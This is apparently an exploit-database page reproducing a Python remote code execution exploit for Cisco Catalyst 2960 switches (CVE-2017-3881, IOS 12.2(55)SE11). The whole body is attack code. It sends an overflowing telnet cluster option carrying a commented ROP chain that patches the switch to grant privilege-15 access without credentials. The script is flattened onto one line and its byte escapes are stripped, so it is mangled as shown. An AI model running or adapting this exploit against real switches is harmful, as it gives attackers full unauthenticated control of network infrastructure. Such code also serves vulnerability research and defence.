Home / os / winmobile

Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution

Posted on 13 April 2017

#!/usr/bin/python # Exploit Title: Cisco Catalyst 2960 - Buffer Overflow # Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/ # Date: 04.10.2017 # Exploit Author: https://twitter.com/artkond # Vendor Homepage: https://www.cisco.com/ # Version: IOS version c2960-lanbasek9-mz.122-55.SE11) # Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11 # CVE : CVE-2017-3881 # Description: # # The exploit connects to the Catalyst switch and patches # it execution flow to allow credless telnet interaction # with highest privilege level # import socket import sys from time import sleep set_credless = True if len(sys.argv) < 3: print sys.argv[0] + ' [host] --set/--unset' sys.exit() elif sys.argv[2] == '--unset': set_credless = False elif sys.argv[2] == '--set': pass else: print sys.argv[0] + ' [host] --set/--unset' sys.exit() s = socket.socket( socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 23)) print '[+] Connection OK' print '[+] Recieved bytes from telnet service:', repr(s.recv(1024)) print '[+] Sending cluster option' print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication' payload = 'xffxfax24x00' payload += 'x03CISCO_KITSx012:' payload += 'A' * 116 payload += 'x00x00x37xb4' # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; #next bytes are shown as offsets from r1 payload += 'x02x3dx55xdc' # +8 address of pointer to is_cluster_mode function - 0x34 if set_credless is True: payload += 'x00x00x99x9c' # +12 set address of func that rets 1 else: payload += 'x00x04xeAxe0' # unset payload += 'BBBB' # +16(+0) r1 points here at second gadget payload += 'x00xe1xa9xf4' # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr; payload += 'CCCC' # +8 payload += 'DDDD' # +12 payload += 'EEEE' # +16(+0) r1 points here at third gadget payload += 'x00x06x7bx5c' # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr; payload += 'x02x3dx55xc8' # +8 r1+8 = 0x23d55c8 payload += 'FFFF' # +12 payload += 'GGGG' # +16(+0) r1 points here at fourth gadget payload += 'x00x6cxb3xa0' # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr; if set_credless: payload += 'x00x27x0bx94' # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr; else: payload += 'x00x04xe7x78' # unset payload += 'HHHH' # +12 payload += 'IIII' # +16(+0) r1 points here at fifth gadget payload += 'x01x4axcfx98' # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr; payload += 'JJJJ' # +8 r1 points here at third gadget payload += 'KKKK' # +12 payload += 'LLLL' # +16 payload += 'x01x14xe7xec' # +20 original execution flow return addr payload += ':15:' + 'xffxf0' s.send(payload) print '[+] All done' s.close()

 

TOP